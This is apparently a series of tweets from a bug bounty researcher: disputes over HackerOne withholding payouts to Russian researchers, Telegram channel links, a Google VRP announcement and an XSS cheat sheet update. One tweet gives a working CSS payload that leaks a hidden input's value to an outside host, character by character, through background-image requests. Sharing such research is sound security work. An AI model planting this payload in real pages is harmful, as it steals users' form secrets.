4) Actually yes, the money are "just frozen" till the sanctions end. BUT, AFAIK, there's no sanctions now restricting all payments to Russia. There are banks under sanctions, there are ones that not. And Google pays to these banks. But H1 doesn't.
So it make me think H1 just doesn't want to execute their part of a deal and they aren't going to support their "valuable researchers".
5) I've got NO reply from H1 regarding my questions since March. This tweet doesn't change anything too.
@yeswehack@Bugcrowd@GoogleVRP@fbsecurity Folks do any of you plan to continue working with Russian researchers in strict accordance with your policy and following just gov sanctions not your own ones?
🇺🇸 Started a Telegram channel in English with my Bug bounty thoughts, tips and tricks.
https://t.co/VNnIhBIJSI
🇷🇺 Начал вести Telegram-канал на русском о своем опыте Bug Bounty
https://t.co/cOtDfKwnIx
It's interesting that CSS-exfiltration of "hidden input" value is possible if you make a browser think the input is not hidden.
<input type=hidden value=123>
<style>
input[value^="1"] {display: block; background-image: url(https://t.co/kb4IO5aWl4)}
</style>
Works in Chrome 👍
To celebrate 10 years of @google's Vulnerability Rewards Programs, we are excited to announce the launch of our new platform: https://t.co/iBpWvPDcvl!
Learn more about the platform and enhancements to our VRP program here: https://t.co/cZmBCyt91c
We've added two new sections on content types to our XSS cheat sheet. They are useful when you can upload a file or control part of the content type header. Big thanks to @Black2Fan for the great research and @shafigullin for the request.
https://t.co/raX6Mju7V8